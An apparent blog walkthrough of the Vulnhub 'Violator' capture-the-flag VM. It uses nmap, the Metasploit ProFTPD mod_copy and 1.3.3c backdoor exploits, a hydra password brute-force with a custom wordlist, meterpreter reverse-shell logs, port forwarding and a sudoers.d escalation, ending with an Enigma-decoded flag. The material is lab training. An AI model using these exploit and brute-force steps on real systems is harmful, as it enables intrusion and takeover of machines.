Violator walkthrough

This is how I got into solving quite a fun VM hosted at vulnhub created by @knightmare2600

As usual I first import the VM into virtualbox, change its name and finally start it

VBoxManage import violator.ova
VBoxManage modifyvm — name violator
VBoxManage startvm violator

I then boot my kali VM which I’ll use to pentest the target.

The DHCP attributed violator the following ip : 192.168.1.162

Let’s fire and see what interesting ports we could try to dig into : not much but not nothing !

nmap -sS -PN -n -sV -sC 192.168.1.162

A quick look into possible exploits reveals the FTP server is exploitable, on top of that an exploit is available on metasploit.

searchsploit proftpd 1.3.5

So let’s fire metasploit and see if we can use the exploit

msfconsole
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.1.162
run

We got this error…I can’t write to the website path it seems.

Let’s look at the options

show info

I see there that SITEPATH defaults to /var/www but remember, the website runs Apache 2.4.7.

There was a VM with a blind directory traversal that drove me crazy a while ago. I used this cheatsheet to solve it and it proved so useful ! Now according to that wiki it seems /var/www is indeed the default for that combination of OS (Ubuntu) and webserver Apache 2.x, but you never know.

Let’s see if changing that works

set SITEPATH /var/www/html

and..bingo, we got a shell, lucky change it seems !

Now that we’re in the target, let’s see if we got interesting stuff, but 1st, let’s grab a proper shell, this one sucks, fortunately we got python and this excellent one-liner I got from here

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now armed with a proper shell, let’s dig into the VM, as expected we are the webserver user, who are the others ?

As you can see almost all Depeche Mode members are here except the hint Vince Clarke :) Looking at /etc/group reveals dg is the most interesting one as he’s part of adm and sudo group !

After that I dug around and tried many things that didn’t work.

At first I thought the kernel might be exploitable with the overlayfs but no variation found on exploit-db.com worked.

I then launched that linprivchecker.py script I use sometimes, and literally tried all the potential exploits there to no avail ….

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS…
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a ‘**’ but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
The following exploits are applicable to this kernel version and should be investigated as well
— Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
— Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
— CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
— CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
— MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
— open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
— open-time Capability file_ns_capable() — Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Sudo version is not exploitable, no passwords revealed in /etc files, nothing obvious.

The only thing that I’m still curious about is if that .access files owned by root and writable by anyone is a possible threat. I couldn’t find anything but this one seems suspicious enough. In fact I couldn’t write to it because of a vim backup error

[+] World Writable Files
-rw-rw-rw- 1 root root 0 Jul 9 21:06 /sys/kernel/security/apparmor/.access

At the same time, looking at the /home folder I could find quite a lot of things.

First a hint in /home/af/hint that says

You are getting close… Can you crack the final enigma..?

Then a file called faith_and_devotion in /home/mg reading :

Lyrics:
* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

And C program in /home/af that is an Enigma machine !

It seems like we need to decode a Enigma machine code, we even got the machine settings to do that, it might be cool to know what to decode though !

I read the source c code and no obvious encrypted message was inside.

So no obvious exploit, no password revealed in conf files, how can we progress?

At that point I was stuck and just annoyed. The /home/dg folder also contains a bd folder owned by root, and dg is the only one in sudo group, maybe dg can launch those executables inside, one of them being again a proftpd server !

Last solution would be to brute force the passwords if possible, I fired hydra with the embedded lists and came up with nothing, then again thought about the theme and well, could it be that the Lyrics hint is an album name or sa ong name of that amazing band ?

So let’s build a depechemode list with song and album names. Wikipedia is fantastic, I’ve never been a fan of Depeche Mode and only know Personal Jesus and frankly I wouldn’t be able to quote anything else.

Let’s use those 2 URLs:

https://en.wikipedia.org/wiki/Category:Depeche_Mode_albums

https://en.wikipedia.org/wiki/Category:Depeche_Mode_songs

Now I would hate to copy paste 68 songs by hand, Chromium has a super nice extension called XPath helper that enables you to copy the results of an XPath query. While FireDebug can make some XPath queries with FirePath, I’m not aware of the possibility of getting the results in your clipboard but if you know a way I’m interested !

Let’s clean it removing (Depeche Mode song) and (song) at the end if applicable,

:%s/ (Depeche Mode song)//g
:%s/ (song)//g

Then let’s add the same names without the capitalization and without spaces with that little snippet.

#!/usr/bin/env python
import os
with open(‘/root/Desktop/violator/depechemode’,’r’) as f:
for line in f:
l = line.lower()
lr = line.lower().replace(“ “,””)
with open(‘/root/Desktop/violator/depechemode.all’, ‘a’) as fw:
fw.write(l)
fw.write(lr)

Now let’s test hydra !

hydra -L /root/Desktop/violator/user.txt -P /root/Desktop/violator/depechemode.all -u 192.168.1.162 ftp

Hourra, we got 3 passwords !
As mentioned earlier, dg is the most interesting as it belongs to sudo

So let’s go back to our shell and login as dg, then sudo -l to see what dg can run and surprise, this is /home/dg/bd/sbin/proftpd, so let’s run it

Matching Defaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dg may run the following commands on violator:
(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd

If things are as expected when reading the /home/dg/bd/etc/proftpd.conf file, it should be on 2121, we’ll verify that with netstat

sudo /home/dg/bd/sbin/proftpd
netstat -tnlp

So note here that this new ftp server listens to localhost so we won’t reach it from the outside, and likely won’t get any information from nmap on kali, unless we forward the port.

But a simple /home/dg/bd/sbin/proftpd -vv reveals that we run

ProFTPD Version: 1.3.3c (maint)
Scoreboard Version: 01040003
Built: Mon Jun 6 2016 21:31:03 BST

Remember the proftpd exploits list ? Well this one has a backdoor !

So let’s upgrade our session to a meterpreter one, then forward the 2121 to our attacking machine, you can choose the port, I took 6666, so that we can run the new exploit with now RPORT set to that port, and of course RHOST set to 127.0.0.1

msf exploit(proftpd_modcopy_exec) > sessions -u 2
[*] Executing ‘post/multi/manage/shell_to_meterpreter’ on session(s): [2]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.1.112:4433
[*] Starting the payload handler…
[*] Transmitting intermediate stager for over-sized stage…(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.1.162
[*] Meterpreter session 3 opened (192.168.1.112:4433 -> 192.168.1.162:56871) at 2016–07–10 19:17:19 +0100
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(proftpd_modcopy_exec) >
msf exploit(proftpd_modcopy_exec) > sessions -l
Active sessions
===============
Id Type Information Connection
— — — — — — — — — — — — — —
2 shell unix 192.168.1.112:4444 -> 192.168.1.162:39653 (192.168.1.162)
3 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ violator 192.168.1.112:4433 -> 192.168.1.162:56871 (192.168.1.162)
msf exploit(proftpd_modcopy_exec) > sessions -i 3
[*] Starting interaction with 3…
meterpreter > portfwd add -L 127.0.0.1 -l 6666 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:6666 <-> 127.0.0.1:2121
meterpreter >
Background session 3? [y/N]
msf exploit(proftpd_modcopy_exec) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(proftpd_133c_backdoor) > set CMD touch /tmp/amiroot
CMD => touch /tmp/amiroot
msf exploit(proftpd_133c_backdoor) > set RPORT 6666
RPORT => 2121
msf exploit(proftpd_133c_backdoor) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(proftpd_133c_backdoor) > run
[*] Started reverse TCP double handler on 127.0.0.1:4444 
[*] Sending Backdoor Command
[*] Exploit completed, but no session was created.

Now we got a /tmp/amiroot file owned by root. Let’s then abuse sudo in putting a file in /etc/sudoers.d that allows dg everything !

We first create a temporary file /tmp/dg with the required permissions then the exploit will move it and set the right owner, root hopefully

Let’s verify if this worked !! Success, we’re root :)

Let’s now inspect the /root folder, we got the flag in it and a hidden folder basildon which contains a rar file called crocs.rar

I installed scp to get on my kali machine that rar file, and try to open it, unfortunately it’s password protected…

John saves us and give the hash, let’s crack it. It happened that it took me some time to realise my depechemode.all didn’t contain the original songs name parsed from Wikipedia, whereas the pass is a well capitalized song name.

We have a nice album artwork now, does it contain the Enigma message ?

Sure it does, in the Copyright, let’s see if with the faith_and_devotion instructions we found above we can manage to get the final flag

Success, here it’s the version properly spaced :)

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE

Thanks to @knightmare2600 for this fun VM, good message at the end.

edit : I didn’t even notice there was another final challenge, thought it was a troll, but a little tweet from the author revealed it, I let you find it by yourself, one has to be a real fan of Depeche Mode to be that precise !

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.